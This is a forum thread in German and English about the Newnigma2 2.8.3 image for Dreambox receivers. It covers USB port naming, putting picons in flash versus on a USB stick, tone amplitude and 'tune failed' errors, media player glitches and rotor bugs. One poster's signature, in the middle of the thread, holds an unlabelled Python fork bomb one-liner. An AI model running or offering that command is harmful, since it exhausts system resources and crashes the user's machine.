DM800: Newnigma2 v2.8.3

    • Hi all
      as Mr Igor1312 said: fix lower usb port is sda1 and upper usb port is sdb1 then config device to record easy than because when Dm800 reboot(take off cord from power) name usb port allway change, it is good idea if have method?
      and another problem with me is somtime dm800 recognise device on usb port is as network device (waiting 19 seconds not 2 second is nomal). how to solve it?
      I set on "recording path" right but when put red button and video button they do not chang device after that i have to put off one of them then it work!

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von dktn ()

    • Kann keine Picons Online in den Flash Installieren

      Kann keine Picons Online in den Flash Installieren bekomme immer nur zur auswahl das ich diese auf die hdd installieren kann ?(.Wie bekomme ich es denn Manuell peer FTP Programm hin das ich diese in den Flash der Box kopieren kann und wo kann ich die picon addons runterladen?

      thx im voraus
      mfg harry

      Dreambox 8000SS
    • RE: Kann keine Picons Online in den Flash Installieren

      Original von harry
      Kann keine Picons Online in den Flash Installieren bekomme immer nur zur auswahl das ich diese auf die hdd installieren kann ?(.Wie bekomme ich es denn Manuell peer FTP Programm hin das ich diese in den Flash der Box kopieren kann und wo kann ich die picon addons runterladen?

      thx im voraus


      Ist wohl absicht so... siehe das hier:

      Original von LoUiS
      Original von kaapsviooltje1
      Hello All, just flashed the latest image 2.8.3! All ok except i cannot install picon skin HD 3D all sat (or any other picon) in the FLASH. The only option i get is to install on the HDD which i do no not want! Same goes for recovering using configsaver! Is there any solution/alternative way to install the Skin Picons in the Flash?

      thanks in advance, Kaapsviooltje1, DM800HD,


      Go get a cheap USB-Memory-Stick and install Picons and/or Savefiles there. ;)
      - Samsung LE-40M87BD
      - Dreambox DM800se
      - Denon AVR-1610 + Teufel Kompakt 30 5.1
    • habe mir den kompletten tread durchgelesen, leider nix über " TONE AMPLITUDE " gefunden.
      -wie stellt man den wert am besten ein ?
      -kann ich die hardware beschädigen, bei falscher einstellung ?
      -momentan hab ich es auf 700mV stehen
      -hilft das bei "tuned failed" ?

      wo kann ich mich genau informieren darüber? um die optimalen einstellungen zu finden für meine anlage?
    • Original von mod1911
      habe mir den kompletten tread durchgelesen, leider nix über " TONE AMPLITUDE " gefunden.
      -wie stellt man den wert am besten ein ?
      -kann ich die hardware beschädigen, bei falscher einstellung ?
      -momentan hab ich es auf 700mV stehen
      -hilft das bei "tuned failed" ?

      wo kann ich mich genau informieren darüber? um die optimalen einstellungen zu finden für meine anlage?



      was hast du denn genau ? astra hotbird ?? wenn ja

      musst du meist erst hotbird und dann astra nehmen und mal das treiberupdate reinhauen :)
    • das update hab ich drauf getan.
      habe 19° - 13° - 23,5°

      habe probleme mit hotbird, bis 2.8.1 war es immer 23,5° das ärger machte. jetzt ist es 13°.

      versteh ich es richtig, das die reihenfolge wichtig ist? also am besten 13° - 19° -23,5° ?

      EDIT : hab die lnb jetzt auch umgesteckt, das erste rumzappen gibt kein tune failed mehr :) :) :)
      DANKE für den tipp, du bist mein held

      wofür ist den das mV bei tone amplitude in der cfg ?

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von mod1911 ()

    • Kleine Probs

      Hallo

      Erstmal. Super Image :freu:

      Aber ich da so ein paar kleine Probleme.

      1. Die Infobar wird beim spulen im Media Player nicht angezeigt. Hab die Einstellung schon auf "Nein" und wieder auf "Ja" gesetzt hat aber keine Wirkung.
      Beim Media Center Plugin funktioniert dies.

      2. Wenn ich Spule und dann die Playtaste drücke um den Film weiter laufen zu lassen gehts zurück zur Filmliste. Der Film stoppt, aber in der Wiedergabeliste ist kein Zeichen davor. Ich muß dann OK drücken und er fragt ob ich von der letzten Position abspielen möchte. (Pause funktioniert zwar ist aber etwas nervig immer hin und her zu springen)
      Beim Media Center Plugin funktioniert dies.

      3. Wenn ich das Media Player starte soll er im letzten Verzeichnis starten. Wenn die Festplatte aber Idle ist hängt sich das Image auf. Gibts da die Möglichkeit nen längeres timeout einzubauen?

      Das wars dann auch erstmal.

      Auch so ich hab ne DM800.

      Großes Lob an die Entwickler :prost:
      Wer viel kann muß auch viel machen - Wer nichts kann, kann auch nichts falsch machen - Wer etwas falsch macht weiß nicht was er tut - Wer etwas richtig macht, kann aber auch nur Glück gehabt haben

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von darkside1977 ()

    • Original von std
      Hi

      soll im Unstable wieder funktionieren mit der CF

      USB-Stick kommt für mich auch nicht in Frage, und das ist keine Frage des Geldes


      Hm, Picons ins Flash??? Da find ich den Flash-Speicher zu schade für..
      Auf die interne HDD ist auch nix.. dann greift das System bei jedem zappen auf die Platte zu..

      Einzige wirklich gute Alternative:

      - USB-Stick in unteren Port / Mit Linux formatieren / Dann Auslagerungsdatei drauf legen / Picon-Pfade auf Lower-USB stellen

      und alles klappt :)


      Sehe absolut keinen Vorteil diese ins flash zu legen..
      Der Stick ist nur für Picons, Backupdateien und für den Swap an der Box.

      Für alles andere ----> interne HDD oder eben Netzwerk...
      greetz

      zaphod

      Box:
      1. Dreambox 7020HD - aktuelles NewNigma2OE2.0 unstable
      Wavefrontier T55 / 13.0 / 19.2 / 23.5 / 28.2
      2. Nokia Dbox2 extern. MC latest Keywelt
    • Original von zaphod
      Original von std
      Hi

      soll im Unstable wieder funktionieren mit der CF

      USB-Stick kommt für mich auch nicht in Frage, und das ist keine Frage des Geldes


      Hm, Picons ins Flash??? Da find ich den Flash-Speicher zu schade für..
      Auf die interne HDD ist auch nix.. dann greift das System bei jedem zappen auf die Platte zu..

      Einzige wirklich gute Alternative:

      - USB-Stick in unteren Port / Mit Linux formatieren / Dann Auslagerungsdatei drauf legen / Picon-Pfade auf Lower-USB stellen

      und alles klappt :)


      Sehe absolut keinen Vorteil diese ins flash zu legen..
      Der Stick ist nur für Picons, Backupdateien und für den Swap an der Box.

      Für alles andere ----> interne HDD oder eben Netzwerk...


      So sieht es aus endlich mal jemand der das auch so sieht.
      Aber es wird demnächst möglich sein das flexibel zu handhaben wer das in flash will
      kann das auch da installieren oder aber in ein verzeichnis seiner wahl vorausgesetzt er bekommt das mit dem neuen plugin gebacken.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von liliom
      Original von zaphod

      Hat das einen besonderen Grund das du den unteren Port empfiehlst?


      Hm, Nö ;)

      Damit hab ichs seit dem 2.8.0 so eingerichtet und klappt auch immer zu 100%..

      Ggf. muss nach nem Online-Update kurz der Pfad nochmal angepasst werden..
      greetz

      zaphod

      Box:
      1. Dreambox 7020HD - aktuelles NewNigma2OE2.0 unstable
      Wavefrontier T55 / 13.0 / 19.2 / 23.5 / 28.2
      2. Nokia Dbox2 extern. MC latest Keywelt
    • Since 2.8.2 rotor bugs have started on enigma2. It actually sometimes, randomly forgets to send the "move" command...so your rotor just sits there while enigma thinks it's moving.... this only started happening after 2.8.1, and it didn't got better with the latest dvb modules (tuning failed bug) .

      Also, didn't anyone notice that the PICTURE of the MOVING DISH is lacking a black background ? It s a blue/white box with a dish in it, on a black screen ... also started after 2.8.1 ... but that s just an esthetic bug, no problem.

      Rotor moving is really annoying, as this happens really randomly. Have tested on 2 different boxes with 2 different rotors ...

      Hope it gets fixed soon.
    • RE: Rotor Bugs

      Original von FiloFx
      Since 2.8.2 rotor bugs have started on enigma2. It actually sometimes, randomly forgets to send the "move" command...so your rotor just sits there while enigma thinks it's moving.... this only started happening after 2.8.1, and it didn't got better with the latest dvb modules (tuning failed bug) .

      Also, didn't anyone notice that the PICTURE of the MOVING DISH is lacking a black background ? It s a blue/white box with a dish in it, on a black screen ... also started after 2.8.1 ... but that s just an esthetic bug, no problem.

      Rotor moving is really annoying, as this happens really randomly. Have tested on 2 different boxes with 2 different rotors ...

      Hope it gets fixed soon.


      Yes, thats true! I have the same Problems! After so long Time , I have this stupid "Tunen Faild" ( Tunen Fehlgeschlagen ) again! Offcourse i made Software ( Driver Update) on Newnigma2 2.8.3 , but this Update has not solved the Rotor Problem!

      Rg!
      "...i have a Dream....i still have a Dream, that one Day we all have a Dreambox..."